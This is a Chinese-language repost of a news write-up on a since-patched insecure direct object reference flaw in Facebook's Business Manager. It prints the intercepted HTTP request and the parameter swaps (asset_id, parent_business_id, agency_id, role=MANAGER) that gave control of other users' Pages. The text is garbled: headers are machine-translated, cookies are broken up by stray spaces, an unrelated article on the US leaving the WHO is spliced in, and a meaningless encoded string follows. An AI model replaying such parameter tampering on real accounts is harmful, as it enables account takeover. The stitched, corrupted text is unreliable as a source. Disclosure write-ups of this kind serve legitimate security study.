怎么黑你的？来自印度的安全研究专家说他有话要说。根据国外媒体的最新报道，一位名叫的印度安全专家在“企业管理平台”(enterprise management platform)中发现了一个严重的漏洞，攻击者可以利用这个漏洞攻击任何人的主页。

什么是()的企业管理平台？

“企业管理平台”可以帮助企业、广告代理机构或营销人员在统一的界面下集中管理企业的主页、广告账户、支付方式，从而避免管理者需要不断切换界面的尴尬局面。

大型企业通常有多个粉丝主页，这些主页有不同的市场定位和目标。对于企业管理者来说，“企业管理平台”可以帮助他们在同一个界面下管理所有粉丝页面和广告账号。此外，他们还可以查看、删除或更改相应用户的权限。

Facebook粉丝页面的管理人员可以登录“企业管理平台”，直接访问广告账户和主页的各种信息。此时，并非所有的Facebook个人资料都会显示给雇主，而只会显示姓名、公司名称和广告账号等信息，因此经理们不必担心将工作中联系的人添加为Facebook好友。

不安全的直接对象引用

在我们分析这种攻击技术之前，请允许我介绍一下“不安全直接对象引用”的概念。

根据OWASP项目(Open Web Application Security Project)提供的定义，当Web应用程序可以根据用户提供的输入信息为用户提供对对象的直接访问时，就是不安全的直接对象引用。该漏洞的存在将允许攻击者绕过系统的认证机制，直接访问网络系统中的所有资源。

根据OWASP项目提供的官方信息：

“不安全的直接对象引用会让攻击者绕过系统的认证机制，通过修改对象的引用参数值就可以直接访问系统资源。这些资源可以是属于其他用户的数据库数据或存储在文件系统中的文件。如果Web应用程序直接向用户提供所请求对象的访问权限，而不对用户的输入数据进行安全检测，就会出现这种不安全的情况。”

Facebook漏洞分析

Sureshkumar在Facebook的企业管理平台上发现了一个IDOR(不安全的DirectObject References)漏洞，借助这个漏洞，他可以在十秒钟内获得对任何Facebook主页的控制。

Sureshkumar用自己的Facebook账号(ID=* * * * 1524)添加了一个测试账号(作为伙伴账号)，这个伙伴账号的ID是****5788。在测试中，他使用BurpSuite拦截Facebook的网络请求信息，并修改了请求中的一些数据。

Sureshkumar在他的分析报告中公布了易受攻击的网络请求数据：

POST/business _ share/asset _ to _ agency/？dpr=2HTTP/1.1

Host:business.facebook.com

连接：关闭

内容-长度：436

Origin:https://business.facebook.com

user-agent : Mozilla/5.0(Macintosh；intelmacosx 10 _ 11 _ 6)apple WebKit/537.36(KHTML，like gecko)Chrome/52 . 0 . 2743 . 116 safari/537.36

content-type : APPLication/x-www-form-URL encoded

Accept:*/*

refer :https://BuSINESS . Facebook.com/settings/pages/* * * * * 9075？business _ id=* * * * * 1524

接受-编码：gzip，放气，br

Accept-Language:en-US，en；q=0.8

cookie : RC=2；datr=AWE3Vdungantay0 wtgmpaxb；locale=en _ GBsb=bwe 3v 1 vcnlxjf 87 yy9a8 wwjp；pl=n；Lu=gh2g pbnmzy 1 b1j _ 7j 0z i3 NAA；c _ user=* * * * * 0694；xs=25:5c 6 rnscacx 92ma:2:* * * * *:4837；fr=05UM8RW0tTkDVgbSW。awub 4 pn 0 dvp 1 fqqywworld j _ LE。BXN2EF . il . ffd . 0.0 . bxxbso . awxdkm2i；CSM=2；s=Aa50vjfSfyFHHmC1。BXwxOY_ga=GA1.2.****。* * * * *；p=-2；presence=edvf 3 etime f * * *defcom相关文章最新报道 * euserfa 21 b * * * * a2 estatefdutf * * * * 051 ech FDP _ 5f 1b * * * * F7CC；act=****58/6

parent _ business _ id=* * * * * * 1524 agency _ id=* * * * 5788 asset _ id=* * * * * * 9075 role=MANAGER _ user=* * * * 0694 _ a=1 _ _ dyn=aKU-xxaacauccjdzopz8 awkfbgew8 uhrwqw-xg2g 4 AK 2i8 zfe 8 oqcwkosevmbgcfv8 smvuzxeuw 4 haxwdwsdbzovu-ebcy8 b 48 xix2a wzwex 2 qen4 yecckbby

那么在得到这些数据后，我们该如何攻击Facebook页面呢？

他用目标Facebook账户的ID值替换了请求数据中“asset _ ID”的参数值，然后交换了“parent_business_id”和“agency_id”的值。此外，他将“角色”参数的值更改为“MANAGER”。

parent _ business _ id=* * * * * 5788

agency_id=****1524

asset _ id=* * * * * 1022

role=MANAGER

经过以上一系列操作，Sureshkumar演示了如何攻击Facebook的主页，并获得了企业管理平台页面的管理员权限。此外，Sureshkumar还发布了一段攻击演示视频。

PoC视频：

https://youtu.be/BSnksWX5Kn0(腾讯视频正在上传，请稍候)

结束语

这位来自印度的安全研究专家于2016年8月29日向Facebook正式提交了该漏洞。Facebook的安全技术人员分析了该漏洞，并在调查过程中意外发现了平台中的另一个安全漏洞。

根据Facebook的漏洞奖励计划，这家社交网络巨头向苏雷什库马提供了16，000美元的漏洞奖金。这个漏洞价值16，000美元。BugHunter激动了吗？

特朗普又退群了 美国正式退出世卫组织

据BBC评论员文章，从过去30年来，无论是经济、安全还是政治体制，改革开放和经济腾飞

中国是现有国际秩序的受益者。

一些分析师认为，俄罗斯也对中国日益增强的国际影响力和经济军事实力保持警惕，不愿意支持中国成为国际新秩序的领导者。

现在，中国已经成为联合国系统越来越重要的贡献者。比如，中国已成为联合国维和部队最大的派遣国之一，也是安理会成员国中第二大派遣国和出兵国，国际影响力正在蓬勃发展。

因此，特朗普不断退出现有的国际政治、经济、安全、文化和科技体系。

它为中国领导新的国际和地区局势创造了更多的可能性。

：

-

？===otg5x 1 ldefjbimjtwmjf3m xroqmn 4 uznvxdzduuhqb0 jmuutcnkzynxv 2 T3 ffmlhenwxqvzaynxxhzzugrodghushluy3n 6 nnnuwv 2 XL xnkluddvkzgrfdxbvwkl5 b 0 ewzzlzhbhy1 lutmf9 lm1 hyzzbiauvprfnturkcfjidzcwfbiced 6 C1 mwc 2 t2zwvnrdu5 daz1 HR 0 hqae 5 rdte 0 dvyulf

这篇文章最早出现在微信微信官方账号：北美学生日报。文章内容属于作者个人观点，不代表贺勋立场。投资者应自担风险进行相应操作。

(主编：

楼再侠)

标签： #defcom相关文章最新报道